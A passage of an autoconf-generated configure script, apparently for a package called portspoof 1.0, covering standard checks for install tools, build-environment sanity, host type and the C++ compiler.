+ac_cache_corrupted=false +for ac_var in $ac_precious_vars; do + eval ac_old_set=\$ac_cv_env_${ac_var}_set + eval ac_new_set=\$ac_env_${ac_var}_set + eval ac_old_val=\$ac_cv_env_${ac_var}_value + eval ac_new_val=\$ac_env_${ac_var}_value + case $ac_old_set,$ac_new_set in + set,) + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5 +$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;} + ac_cache_corrupted=: ;; + ,set) + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was not set in the previous run" >&5 +$as_echo "$as_me: error: \`$ac_var' was not set in the previous run" >&2;} + ac_cache_corrupted=: ;; + ,);; + *) + if test "x$ac_old_val" != "x$ac_new_val"; then + # differences in whitespace do not lead to failure. + ac_old_val_w=`echo x $ac_old_val` + ac_new_val_w=`echo x $ac_new_val` + if test "$ac_old_val_w" != "$ac_new_val_w"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' has changed since the previous run:" >&5 +$as_echo "$as_me: error: \`$ac_var' has changed since the previous run:" >&2;} + ac_cache_corrupted=: + else + { $as_echo "$as_me:${as_lineno-$LINENO}: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&5 +$as_echo "$as_me: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&2;} + eval $ac_var=\$ac_old_val + fi + { $as_echo "$as_me:${as_lineno-$LINENO}: former value: \`$ac_old_val'" >&5 +$as_echo "$as_me: former value: \`$ac_old_val'" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: current value: \`$ac_new_val'" >&5 +$as_echo "$as_me: current value: \`$ac_new_val'" >&2;} + fi;; + esac + # Pass precious variables to config.status. + if test "$ac_new_set" = set; then + case $ac_new_val in + *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;; + *) ac_arg=$ac_var=$ac_new_val ;; + esac + case " $ac_configure_args " in + *" '$ac_arg' "*) ;; # Avoid dups. Use of quotes ensures accuracy. + *) as_fn_append ac_configure_args " '$ac_arg'" ;; + esac + fi +done +if $ac_cache_corrupted; then + { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: error: changes in the environment can compromise the build" >&5 +$as_echo "$as_me: error: changes in the environment can compromise the build" >&2;} + as_fn_error "run \`make distclean' and/or \`rm $cache_file' and start over" "$LINENO" 5 +fi +## -------------------- ## +## Main body of script. ## +## -------------------- ## + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + +ac_aux_dir= +for ac_dir in auto "$srcdir"/auto; do + for ac_t in install-sh install.sh shtool; do + if test -f "$ac_dir/$ac_t"; then + ac_aux_dir=$ac_dir + ac_install_sh="$ac_aux_dir/$ac_t -c" + break 2 + fi + done +done +if test -z "$ac_aux_dir"; then + as_fn_error "cannot find install-sh, install.sh, or shtool in auto \"$srcdir\"/auto" "$LINENO" 5 +fi + +# These three variables are undocumented and unsupported, +# and are intended to be withdrawn in a future Autoconf release. +# They can cause serious problems if a builder's source tree is in a directory +# whose full name contains unusual characters. +ac_config_guess="$SHELL $ac_aux_dir/config.guess" # Please don't use this var. +ac_config_sub="$SHELL $ac_aux_dir/config.sub" # Please don't use this var. +ac_configure="$SHELL $ac_aux_dir/configure" # Please don't use this var. + + + + +am__api_version='1.11' + +# Find a good install program. We prefer a C program (faster), +# so one script is as good as another. But avoid the broken or +# incompatible versions: +# SysV /etc/install, /usr/sbin/install +# SunOS /usr/etc/install +# IRIX /sbin/install +# AIX /bin/install +# AmigaOS /C/install, which installs bootblocks on floppy discs +# AIX 4 /usr/bin/installbsd, which doesn't work without a -g flag +# AFS /usr/afsws/bin/install, which mishandles nonexistent args +# SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" +# OS/2's system install, which has a completely different semantic +# ./install, which can be erroneously created by make from ./install.sh. +# Reject install programs that cannot install multiple files. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for a BSD-compatible install" >&5 +$as_echo_n "checking for a BSD-compatible install... " >&6; } +if test -z "$INSTALL"; then +if test "${ac_cv_path_install+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + # Account for people who put trailing slashes in PATH elements. +case $as_dir/ in @%:@(( + ./ | .// | /[cC]/* | \ + /etc/* | /usr/sbin/* | /usr/etc/* | /sbin/* | /usr/afsws/bin/* | \ + ?:[\\/]os2[\\/]install[\\/]* | ?:[\\/]OS2[\\/]INSTALL[\\/]* | \ + /usr/ucb/* ) ;; + *) + # OSF1 and SCO ODT 3.0 have their own names for install. + # Don't use installbsd from OSF since it installs stuff as root + # by default. + for ac_prog in ginstall scoinst install; do + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_prog$ac_exec_ext" && $as_test_x "$as_dir/$ac_prog$ac_exec_ext"; }; then + if test $ac_prog = install && + grep dspmsg "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then + # AIX install. It has an incompatible calling convention. + : + elif test $ac_prog = install && + grep pwplus "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then + # program-specific install script used by HP pwplus--don't use. + : + else + rm -rf conftest.one conftest.two conftest.dir + echo one > conftest.one + echo two > conftest.two + mkdir conftest.dir + if "$as_dir/$ac_prog$ac_exec_ext" -c conftest.one conftest.two "`pwd`/conftest.dir" && + test -s conftest.one && test -s conftest.two && + test -s conftest.dir/conftest.one && + test -s conftest.dir/conftest.two + then + ac_cv_path_install="$as_dir/$ac_prog$ac_exec_ext -c" + break 3 + fi + fi + fi + done + done + ;; +esac + + done +IFS=$as_save_IFS + +rm -rf conftest.one conftest.two conftest.dir + +fi + if test "${ac_cv_path_install+set}" = set; then + INSTALL=$ac_cv_path_install + else + # As a last resort, use the slow shell script. Don't cache a + # value for INSTALL within a source directory, because that will + # break other packages using the cache if that directory is + # removed, or if the value is a relative name. + INSTALL=$ac_install_sh + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $INSTALL" >&5 +$as_echo "$INSTALL" >&6; } + +# Use test -z because SunOS4 sh mishandles braces in ${var-val}. +# It thinks the first close brace ends the variable substitution. +test -z "$INSTALL_PROGRAM" && INSTALL_PROGRAM='${INSTALL}' + +test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL}' + +test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether build environment is sane" >&5 +$as_echo_n "checking whether build environment is sane... " >&6; } +# Just in case +sleep 1 +echo timestamp > conftest.file +# Reject unsafe characters in $srcdir or the absolute working directory +# name. Accept space and tab only in the latter. +am_lf=' +' +case `pwd` in + *[\\\"\#\$\&\'\`$am_lf]*) + as_fn_error "unsafe absolute working directory name" "$LINENO" 5;; +esac +case $srcdir in + *[\\\"\#\$\&\'\`$am_lf\ \ ]*) + as_fn_error "unsafe srcdir value: \`$srcdir'" "$LINENO" 5;; +esac + +# Do `set' in a subshell so we don't clobber the current shell's +# arguments. Must try -L first in case configure is actually a +# symlink; some systems play weird games with the mod time of symlinks +# (eg FreeBSD returns the mod time of the symlink's containing +# directory). +if ( + set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null` + if test "$*" = "X"; then + # -L didn't work. + set X `ls -t "$srcdir/configure" conftest.file` + fi + rm -f conftest.file + if test "$*" != "X $srcdir/configure conftest.file" \ + && test "$*" != "X conftest.file $srcdir/configure"; then + + # If neither matched, then we have a broken ls. This can happen + # if, for instance, CONFIG_SHELL is bash and it inherits a + # broken ls alias from the environment. This has actually + # happened. Such a system could not be considered "sane". + as_fn_error "ls -t appears to fail. Make sure there is not a broken +alias in your environment" "$LINENO" 5 + fi + + test "$2" = conftest.file + ) +then + # Ok. + : +else + as_fn_error "newly created file is older than distributed files! +Check your system clock" "$LINENO" 5 +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } +test "$program_prefix" != NONE && + program_transform_name="s&^&$program_prefix&;$program_transform_name" +# Use a double $ so make ignores it. +test "$program_suffix" != NONE && + program_transform_name="s&\$&$program_suffix&;$program_transform_name" +# Double any \ or $. +# By default was `s,x,x', remove it if useless. +ac_script='s/[\\$]/&&/g;s/;s,x,x,$//' +program_transform_name=`$as_echo "$program_transform_name" | sed "$ac_script"` + +# expand $ac_aux_dir to an absolute path +am_aux_dir=`cd $ac_aux_dir && pwd` + +if test x"${MISSING+set}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + MISSING="\${SHELL} \"$am_aux_dir/missing\"" ;; + *) + MISSING="\${SHELL} $am_aux_dir/missing" ;; + esac +fi +# Use eval to expand $SHELL +if eval "$MISSING --run true"; then + am_missing_run="$MISSING --run " +else + am_missing_run= + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: \`missing' script is too old or missing" >&5 +$as_echo "$as_me: WARNING: \`missing' script is too old or missing" >&2;} +fi + +if test x"${install_sh}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + install_sh="\${SHELL} '$am_aux_dir/install-sh'" ;; + *) + install_sh="\${SHELL} $am_aux_dir/install-sh" + esac +fi + +# Installed binaries are usually stripped using `strip' when the user +# run `make install-strip'. However `strip' might not be the right +# tool to use in cross-compilation environments, therefore Automake +# will honor the `STRIP' environment variable to overrule this program. +if test "$cross_compiling" != no; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}strip", so it can be a program name with args. +set dummy ${ac_tool_prefix}strip; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_STRIP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$STRIP"; then + ac_cv_prog_STRIP="$STRIP" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_STRIP="${ac_tool_prefix}strip" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +STRIP=$ac_cv_prog_STRIP +if test -n "$STRIP"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $STRIP" >&5 +$as_echo "$STRIP" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$ac_cv_prog_STRIP"; then + ac_ct_STRIP=$STRIP + # Extract the first word of "strip", so it can be a program name with args. +set dummy strip; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_STRIP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_STRIP"; then + ac_cv_prog_ac_ct_STRIP="$ac_ct_STRIP" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_STRIP="strip" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_STRIP=$ac_cv_prog_ac_ct_STRIP +if test -n "$ac_ct_STRIP"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_STRIP" >&5 +$as_echo "$ac_ct_STRIP" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + if test "x$ac_ct_STRIP" = x; then + STRIP=":" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + STRIP=$ac_ct_STRIP + fi +else + STRIP="$ac_cv_prog_STRIP" +fi + +fi +INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for a thread-safe mkdir -p" >&5 +$as_echo_n "checking for a thread-safe mkdir -p... " >&6; } +if test -z "$MKDIR_P"; then + if test "${ac_cv_path_mkdir+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH$PATH_SEPARATOR/opt/sfw/bin +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_prog in mkdir gmkdir; do + for ac_exec_ext in '' $ac_executable_extensions; do + { test -f "$as_dir/$ac_prog$ac_exec_ext" && $as_test_x "$as_dir/$ac_prog$ac_exec_ext"; } || continue + case `"$as_dir/$ac_prog$ac_exec_ext" --version 2>&1` in #( + 'mkdir (GNU coreutils) '* | \ + 'mkdir (coreutils) '* | \ + 'mkdir (fileutils) '4.1*) + ac_cv_path_mkdir=$as_dir/$ac_prog$ac_exec_ext + break 3;; + esac + done + done + done +IFS=$as_save_IFS + +fi + + test -d ./--version && rmdir ./--version + if test "${ac_cv_path_mkdir+set}" = set; then + MKDIR_P="$ac_cv_path_mkdir -p" + else + # As a last resort, use the slow shell script. Don't cache a + # value for MKDIR_P within a source directory, because that will + # break other packages using the cache if that directory is + # removed, or if the value is a relative name. + MKDIR_P="$ac_install_sh -d" + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $MKDIR_P" >&5 +$as_echo "$MKDIR_P" >&6; } + +mkdir_p="$MKDIR_P" +case $mkdir_p in + [\\/$]* | ?:[\\/]*) ;; + */*) mkdir_p="\$(top_builddir)/$mkdir_p" ;; +esac + +for ac_prog in gawk mawk nawk awk +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_AWK+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$AWK"; then + ac_cv_prog_AWK="$AWK" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_AWK="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +AWK=$ac_cv_prog_AWK +if test -n "$AWK"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $AWK" >&5 +$as_echo "$AWK" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$AWK" && break +done + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 +$as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } +set x ${MAKE-make} +ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` +if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat >conftest.make <<\_ACEOF +SHELL = /bin/sh +all: + @echo '@@@%%%=$(MAKE)=@@@%%%' +_ACEOF +# GNU make sometimes prints "make[1]: Entering...", which would confuse us. +case `${MAKE-make} -f conftest.make 2>/dev/null` in + *@@@%%%=?*=@@@%%%*) + eval ac_cv_prog_make_${ac_make}_set=yes;; + *) + eval ac_cv_prog_make_${ac_make}_set=no;; +esac +rm -f conftest.make +fi +if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } + SET_MAKE= +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } + SET_MAKE="MAKE=${MAKE-make}" +fi + +rm -rf .tst 2>/dev/null +mkdir .tst 2>/dev/null +if test -d .tst; then + am__leading_dot=. +else + am__leading_dot=_ +fi +rmdir .tst 2>/dev/null + +if test "`cd $srcdir && pwd`" != "`pwd`"; then + # Use -I$(srcdir) only when $(srcdir) != ., so that make's output + # is not polluted with repeated "-I." + am__isrc=' -I$(srcdir)' + # test to see if srcdir already configured + if test -f $srcdir/config.status; then + as_fn_error "source directory already configured; run \"make distclean\" there first" "$LINENO" 5 + fi +fi + +# test whether we have cygpath +if test -z "$CYGPATH_W"; then + if (cygpath --version) >/dev/null 2>/dev/null; then + CYGPATH_W='cygpath -w' + else + CYGPATH_W=echo + fi +fi + + +# Define the identity of the package. + PACKAGE=portspoof + VERSION=1.0 + + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE "$PACKAGE" +_ACEOF + + +cat >>confdefs.h <<_ACEOF +@%:@define VERSION "$VERSION" +_ACEOF + +# Some tools Automake needs. + +ACLOCAL=${ACLOCAL-"${am_missing_run}aclocal-${am__api_version}"} + + +AUTOCONF=${AUTOCONF-"${am_missing_run}autoconf"} + + +AUTOMAKE=${AUTOMAKE-"${am_missing_run}automake-${am__api_version}"} + + +AUTOHEADER=${AUTOHEADER-"${am_missing_run}autoheader"} + + +MAKEINFO=${MAKEINFO-"${am_missing_run}makeinfo"} + +# We need awk for the "check" target. The system "awk" is bad on +# some platforms. +# Always define AMTAR for backward compatibility. + +AMTAR=${AMTAR-"${am_missing_run}tar"} + +am__tar='${AMTAR} chof - "$$tardir"'; am__untar='${AMTAR} xf -' + + + + + + +ac_config_headers="$ac_config_headers src/config.h" + + +$as_echo "@%:@define _GNU_SOURCE 1" >>confdefs.h + + +UNAME=`uname` + +# Make sure we can run config.sub. +$SHELL "$ac_aux_dir/config.sub" sun4 >/dev/null 2>&1 || + as_fn_error "cannot run $SHELL $ac_aux_dir/config.sub" "$LINENO" 5 + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking build system type" >&5 +$as_echo_n "checking build system type... " >&6; } +if test "${ac_cv_build+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_build_alias=$build_alias +test "x$ac_build_alias" = x && + ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"` +test "x$ac_build_alias" = x && + as_fn_error "cannot guess build type; you must specify one" "$LINENO" 5 +ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` || + as_fn_error "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5 + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_build" >&5 +$as_echo "$ac_cv_build" >&6; } +case $ac_cv_build in +*-*-*) ;; +*) as_fn_error "invalid value of canonical build" "$LINENO" 5;; +esac +build=$ac_cv_build +ac_save_IFS=$IFS; IFS='-' +set x $ac_cv_build +shift +build_cpu=$1 +build_vendor=$2 +shift; shift +# Remember, the first character of IFS is used to create $*, +# except with old shells: +build_os=$* +IFS=$ac_save_IFS +case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking host system type" >&5 +$as_echo_n "checking host system type... " >&6; } +if test "${ac_cv_host+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test "x$host_alias" = x; then + ac_cv_host=$ac_cv_build +else + ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` || + as_fn_error "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5 +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_host" >&5 +$as_echo "$ac_cv_host" >&6; } +case $ac_cv_host in +*-*-*) ;; +*) as_fn_error "invalid value of canonical host" "$LINENO" 5;; +esac +host=$ac_cv_host +ac_save_IFS=$IFS; IFS='-' +set x $ac_cv_host +shift +host_cpu=$1 +host_vendor=$2 +shift; shift +# Remember, the first character of IFS is used to create $*, +# except with old shells: +host_os=$* +IFS=$ac_save_IFS +case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac + + + + +# Check system type +case "$host_os" in +linux*) + +cat >>confdefs.h <<_ACEOF +@%:@define LINUX 1 +_ACEOF + + ;; +esac + +# Checks for programs. +ac_ext=cpp +ac_cpp='$CXXCPP $CPPFLAGS' +ac_compile='$CXX -c $CXXFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CXX -o conftest$ac_exeext $CXXFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_cxx_compiler_gnu +if test -z "$CXX"; then + if test -n "$CCC"; then + CXX=$CCC + else + if test -n "$ac_tool_prefix"; then + for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC + do + # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. +set dummy $ac_tool_prefix$ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CXX+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CXX"; then + ac_cv_prog_CXX="$CXX" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CXX="$ac_tool_prefix$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CXX=$ac_cv_prog_CXX +if test -n "$CXX"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CXX" >&5 +$as_echo "$CXX" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$CXX" && break + done +fi +if test -z "$CXX"; then + ac_ct_CXX=$CXX + for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CXX+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CXX"; then + ac_cv_prog_ac_ct_CXX="$ac_ct_CXX" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CXX="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CXX=$ac_cv_prog_ac_ct_CXX +if test -n "$ac_ct_CXX"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CXX" >&5 +$as_echo "$ac_ct_CXX" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$ac_ct_CXX" && break +done + + if test "x$ac_ct_CXX" = x; then + CXX="g++" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CXX=$ac_ct_CXX + fi +fi + + fi +fi +# Provide some information about the compiler. +$as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler version" >&5 +set X $ac_compile +ac_compiler=$2 +for ac_option in --version -v -V -qversion; do + { { ac_try="$ac_compiler $ac_option >&5" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compiler $ac_option >&5") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + sed '10a\ +... rest of stderr output deleted ... + 10q' conftest.err >conftest.er1 + cat conftest.er1 >&5 + fi + rm -f conftest.er1 conftest.err + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } +done + +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +ac_clean_files_save=$ac_clean_files +ac_clean_files="$ac_clean_files a.out a.out.dSYM a.exe b.out" +# Try to create an executable without -o first, disregard a.out. +# It will help us diagnose broken compilers, and finding out an intuition +# of exeext. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the C++ compiler works" >&5 +$as_echo_n "checking whether the C++ compiler works... " >&6; } +ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'` + +# The possible output files: +ac_files="a.out conftest.exe conftest a.exe a_out.exe b.out conftest.*" + +ac_rmfiles= +for ac_file in $ac_files +do + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; + * ) ac_rmfiles="$ac_rmfiles $ac_file";; + esac +done +rm -f $ac_rmfiles + +if { { ac_try="$ac_link_default" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link_default") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : + # Autoconf-2.13 could set the ac_cv_exeext variable to `no'. +# So ignore a value of `no', otherwise this would lead to `EXEEXT = no' +# in a Makefile. We should not override ac_cv_exeext if it was cached, +# so that the user can short-circuit this test for compilers unknown to +# Autoconf. +for ac_file in $ac_files '' +do + test -f "$ac_file" || continue + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) + ;; + [ab].out ) + # We found the default executable, but exeext='' is most + # certainly right. + break;; + *.* ) + if test "${ac_cv_exeext+set}" = set && test "$ac_cv_exeext" != no; + then :; else + ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` + fi + # We set ac_cv_exeext here because the later test for it is not + # safe: cross compilers may not add the suffix if given an `-o' + # argument, so we may need to know it at that point already. + # Even if this section looks crufty: it has the advantage of + # actually working. + break;; + * ) + break;; + esac +done +test "$ac_cv_exeext" = no && ac_cv_exeext= + +else + ac_file='' +fi +if test -z "$ac_file"; then : + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +$as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +{ { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +{ as_fn_set_status 77 +as_fn_error "C++ compiler cannot create executables +See \`config.log' for more details." "$LINENO" 5; }; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler default output file name" >&5 +$as_echo_n "checking for C++ compiler default output file name... " >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_file" >&5 +$as_echo "$ac_file" >&6; } +ac_exeext=$ac_cv_exeext + +rm -f -r a.out a.out.dSYM a.exe conftest$ac_cv_exeext b.out +ac_clean_files=$ac_clean_files_save +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for 